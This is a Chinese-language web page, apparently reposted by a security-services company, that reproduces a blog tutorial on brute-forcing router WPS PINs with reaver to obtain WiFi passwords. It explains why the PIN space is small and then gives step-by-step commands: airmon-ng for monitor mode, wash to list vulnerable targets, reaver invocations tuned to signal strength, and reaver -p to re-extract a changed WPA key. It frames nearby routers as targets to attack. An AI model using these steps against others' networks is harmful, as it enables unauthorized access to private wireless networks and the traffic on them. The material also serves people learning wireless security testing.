利用reaver破解目标pin码_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
企业服务导航

利用reaver破解目标pin码

发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370


利用reaver破解目标pin码

1,说到pin码就不得不提wps,它是一种特殊的无线认证协议,当路由器开启wps功能后,会随机生成一个8位的pin码,通过暴力枚举这个pin码(共11000中可能),就可以达到破解目标wifi的目的,很不错的现象是,现在很多路由器默认就开启了wps功能 关于pin码爆破的具体原理简要分析,如下: 前4位为第一部分,第5-7位为第二部分,最后1位为第三部分 第一部分的验证跟第二部分没关联,最后1位的结果是根据第二部分计算得出的校验码 破解一开始是会先单独对第一部分进行pin码匹配,也就是说先破解前4位pin码,而前4位也就是0000-9999共有10000个组合 当前4位pin码确定后再对第二部分进行pin码匹配,再对5-7位进行破解,而5-7位是000-999,共有1000个组合当前7位都确定后,最后1位也会自动得出,即破解完成 根据pin码破解的原理,可以看到只需要枚举11000种情况就会必然破解出pin码,从而通过pin得到wifi密码,这么点儿组合对计算机来讲,破解出来是迟早的,不过实际很大程度上还要依赖于目标路由的网络状况和信号强弱 2,具体的pin码破解流程如下,首先,依然是先开启网卡的监听模式:  # airmon-ng start wlan0 3,而后,开始扫描附近所有开启了wps的无线设备,locked状态为’No’的,都可以作为下手的目标 # wash -i wlan0mon --ignore-fcs  这里有时会报fcs错误,加上该选项即可 4,使用reaver工具爆破pin码,关于reaver 一些选项作用如下 -i 监听后的网卡接口名称 -b 指定目标无线ap的mac地址 -a 自动检测目标AP最佳配置 -S 使用最小的DH key(提高破解速度) -vv 显示详细的破解过程 -d 即delay每穷举一次的闲置时间预设为1秒 -t 即timeout每次穷举等待反馈的最长时间,即破解超时时长 -c 指定频道可以方便找到无线信号,如-c 1 指定1频道 根据无线信号强弱针对性的调整下命令: # reaver -i wlan0mon -b MAC -a -S -vv -d0 -c 1   信号非常好 # reaver -i wlan0mon -b MAC -a -S -vv -d2 -t 5 -c 1 信号普通 # reaver -i wlan0mon -b MAC -a -S -vv -d5 -c 1 信号一般 # reaver -i wlan0mon -b MAC -S -N -vv -c 4 # reaver -i wlan0mon -b DC:EE:06:96:B7:B8 -S -N -vv -c 6 最后,当reaver pin完之后会显示出目标的WPS PIN(正确的pin码)码和WPA PSK密码(正确的wifi密码) 5,假如目标的wpa psk密码被修改了,但wps功能却没有关,pin码也没有改,你还是可以直接用reaver再次获取目标wifi密码,如下: # reaver -i mon0 -b mac -p pin码 一点小结 其实,搞清楚具体的破解原理之后,你会发现其实也并没什么实际性的技术含量,只需要写程序组包跑就是了,可能就是验证的过程有点儿复杂需要多花些时间,但工具(reaver)现在别人都已经为我们写好了,我们所能做的,会用即可,仅此而已,另外,个人并也极不建议一开始破解无线的时候就用这个方法,因为它的速度,大家也可以看到了,影响的因素太多,导致了它非常的慢,尤其是对实地渗透来讲,我们可能根本没有那么长的时间等,所以,能用aircrack搞定的就直接用aircrack来搞定,实在搞不定,再考虑这个也不迟,仅仅是个人建议而已……! 文章出处:klion's blog 原文链接: https://klionsec.github.io/2015/04/16/reaver-crack-pin-code/

利用reaver破解目标pin码